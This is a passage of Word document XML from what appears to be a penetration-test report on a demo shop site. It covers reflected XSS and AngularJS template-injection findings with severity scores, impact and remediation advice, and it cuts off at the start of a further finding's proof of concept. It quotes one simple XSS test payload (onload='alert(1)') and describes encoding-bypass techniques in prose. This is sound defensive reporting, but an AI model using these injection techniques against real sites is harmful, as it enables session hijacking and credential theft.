    <w:p w14:paraId="30772704" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662091B4" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A828AA6" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>User input submitted to the `search` parameter on the blog page is reflected back into the page inside an `&lt;img&gt;` t</w:t>
      </w:r>
      <w:r>
        <w:t>ag attribute context without adequate output encoding, allowing injection of event-handler attributes that execute attacker-controlled JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0DB721" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22374901" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Submitting arbitrary text in the search field caused it to be reflected verbatim inside an &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>img&gt; tag. Testing with special characters confirmed they were not encoded, and a payload of the form onload='</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1)' successfully broke out into the tag's attribute list and executed script on page load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF860F0" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The impact of this specific instance is reduced be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cause the application's session cookie is configured with the Secure and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> flags, which prevents the injected script from directly reading the session cookie via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CABAC27" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D450C73" wp14:editId="1CFB6914">
            <wp:extent cx="5334000" cy="2867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67025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F8539F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 3 — Reflected XSS payload executing via an unencoded &lt;img&gt; attribute in the blog search results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ACD38E" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3CAB6D" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Despite the reduced cookie-theft risk due to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, an attacker can still use this XSS to perform actions in the victim's browser session (e.g</w:t>
      </w:r>
      <w:r>
        <w:t>., page defacement, phishing overlays, forced actions via the DOM, or pivoting to other client-side attacks such as credential harvesting via fake login forms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08896153" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19674FC6" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Apply context-aware output encoding to all user-controlled data before it is render</w:t>
      </w:r>
      <w:r>
        <w:t>ed into HTML attribute contexts, and avoid reflecting raw input into image or other tag attributes. Adopt a strict Content-Security-Policy to prevent inline event handlers from executing even if encoding is missed, and validate/sanitize input server-side i</w:t>
      </w:r>
      <w:r>
        <w:t>n addition to output encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6C0F43" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reference: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9236E2" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>OWASP XSS Prevention Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6350691F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>OWASP To</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>p 10: A03:2021 – Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EDDAF31" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>MDN — Content Security Policy (CSP)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3996B7FA" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:before="500" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>F-04: Client-Side Template Injection (Outdated AngularJS)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="2200" w:type="dxa"/>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514271" w14:paraId="7A421E1D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B91C1C"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="661CCF1B" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="558A4089" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>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7446"/>
      </w:tblGrid>
      <w:tr w:rsidR="00514271" w14:paraId="52190C0C"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33DAA74E" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 3.1 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Score</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>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66512583" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.1 (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="5FD5FF50"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25F0130F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE</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0617F31B" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="51B6402B"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2FB09C38" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected URL</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2565E95C" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://ginandjuice.shop/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57C891FA" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4495144A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26382703" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The application loads a vulnerable, outdated version of the AngularJS frame</w:t>
      </w:r>
      <w:r>
        <w:t>work. Older AngularJS releases evaluate double-curly-brace expressions (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>{{ }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}) found in the DOM as Angular expressions, and certain versions allow these expressions to escape the Angular sandbox and reach native JavaScript execution, resulting in Client-Si</w:t>
      </w:r>
      <w:r>
        <w:t>de Template Injection (CSTI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533D668B" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7593D522" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application was found to render user-influenced content within the scope of an AngularJS template. Because the bundled AngularJS version predates sandbox-escape fixes, an attacker-supplied expression is evaluated by the framework and can be crafted to </w:t>
      </w:r>
      <w:r>
        <w:t>invoke arbitrary JavaScript execution in the victim's browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4364761B" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73FADAD0" wp14:editId="79A94064">
            <wp:extent cx="5334000" cy="3076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076575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0013D449" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 4 — Confirmation of the vulnerable AngularJS version loaded by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C3AC45" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B48BF0" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CSTI in AngularJS effectively provides the same capability as XSS but often bypasses traditional </w:t>
      </w:r>
      <w:r>
        <w:t>HTML-encoding defenses, since the payload is evaluated by the framework's expression parser rather than the browser's HTML parser. This can lead to full script execution in the victim's session context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D695883" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D75778D" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Upgrade AngularJS to the latest patched r</w:t>
      </w:r>
      <w:r>
        <w:t>elease, or migrate to a modern, actively maintained framework, since AngularJS itself reached end-of-life and no longer receives official security patches. Ensure any user-controlled data rendered inside Angular templates is treated as text, not interpolat</w:t>
      </w:r>
      <w:r>
        <w:t>ed as a live expression, and apply a strict CSP as a secondary control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E782D85" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reference: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4377243A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>PortSwigger</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t xml:space="preserve"> — Client-Side Template Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CB5A7E6" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>OWASP XSS Prevention Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FF712CB" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="1D4ED8"/>
          </w:rPr>
          <w:t>AngularJS End-of-Life Announcement</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7498F9B1" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:before="500" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t xml:space="preserve">F-05: Reflected Cross-Site Scripting — Catalog </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>searchTerm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parameter</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="2200" w:type="dxa"/>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514271" w14:paraId="18929E26" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B45309"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2BAFF68F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BC9D53F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>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7446"/>
      </w:tblGrid>
      <w:tr w:rsidR="00514271" w14:paraId="1AEC1EFA"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1906A9A1" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 3.1 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Score</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>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2FA653DD" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.1 (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="75E236E4"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6F6D208E" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE</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4886C938" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-79: Improper Neutralization of Input During Web Page Generation (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="5EF4A202"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0260C8F6" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected URL</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560A29DB" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://ginandjuice.shop/catalog?searchTerm=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69F80356" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA4E78F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535459AD" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>searchTerm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>` parameter on the product catalog endpoint is reflected into the page response. While angle brackets (&lt;, &gt;) are HTML-encoded, other special characters are not, and the encoding can be bypassed using an escape/skip-operator technique to brea</w:t>
      </w:r>
      <w:r>
        <w:t>k out of the surrounding JavaScript string context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66011DEF" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="120" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E63CBB" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
